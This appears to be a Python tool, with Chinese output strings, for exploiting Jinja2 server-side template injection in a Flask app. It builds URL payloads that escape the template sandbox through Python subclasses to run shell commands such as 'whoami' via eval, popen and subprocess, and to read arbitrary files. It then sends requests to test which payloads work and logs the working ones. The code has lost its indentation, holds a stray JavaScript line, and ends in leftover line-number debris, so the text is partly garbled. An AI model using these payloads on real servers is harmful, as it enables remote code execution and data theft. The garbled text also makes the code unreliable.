from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os
site = "http://127.0.0.1:5000/waewe?404_url="
url_dict = {
"popen": [],
"eval": [],
"__import__": [],
"subprocess": [],
}
currency_url = [
"通用payload_rce: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('whoami').read()\") }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_utf8: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='utf-8').read() }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_gbk: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='gbk').read() }}{% endif %}{% endfor %}\n"
]
scan_list = {
"popen": ("__init__.__globals__", "['popen']('whoami').read()"),
"eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
"__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')"),
"subprocess": ("__init__.__globals__", "['subprocess'].check_output('whoami', shell=True).decode('gbk')"),
}
def scan():
num = 0
for item in "".__class__.__base__.__subclasses__():
try:
for ii in scan_list:
if ii in eval("item." + scan_list[ii][0]):
url = "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n" % (
site,
num,
scan_list[ii][0],
scan_list[ii][1]
)
url_dict[ii].append(url)
num += 1
except:
num += 1
def check_active(url, desc):
with open("result.txt", "a", encoding="utf-8") as f:
for i in url:
status_code = requests.get(i).status_code
if not status_code >= 500:
f.write("利用" + desc + ": " + i)
if __name__ == '__main__':
print("开始构造.....")
scan()
if os.path.exists("result.txt"):
os.remove("result.txt")
with open("result.txt", "a", encoding="utf-8") as f:
for i in currency_url:
f.write(i)
t_list = []
for i in url_dict:
t = Thread(target=check_active, args=(url_dict[i], i,))
t.start()
t_list.append(t)
for t in t_list:
t.join()
[1,2,3].slice(0,0)
print("创建完成,请查看当前路径下的 result.txt 文件!!")
- 1.
- 2.
- 3.
- 4.
- 5.
- 6.
- 7.
- 8.
- 9.
- 10.
- 11.
- 12.
- 13.
- 14.
- 15.
- 16.
- 17.
- 18.
- 19.
- 20.
- 21.
- 22.
- 23.
- 24.
- 25.
- 26.
- 27.
- 28.
- 29.
- 30.
- 31.
- 32.
- 33.
- 34.
- 35.
- 36.
- 37.
- 38.
- 39.
- 40.
- 41.
- 42.
- 43.
- 44.
- 45.
- 46.
- 47.
- 48.
- 49.
- 50.
- 51.
- 52.
- 53.
- 54.
- 55.
- 56.
- 57.
- 58.
- 59.
- 60.
- 61.
- 62.
- 63.
- 64.
- 65.
- 66.
- 67.
- 68.
- 69.
- 70.
- 71.
- 72.
- 73.
- 74.
- 75.
- 76.
- 77.
- 78.
- 79.
- 80.
- 81.
- 82.
- 83.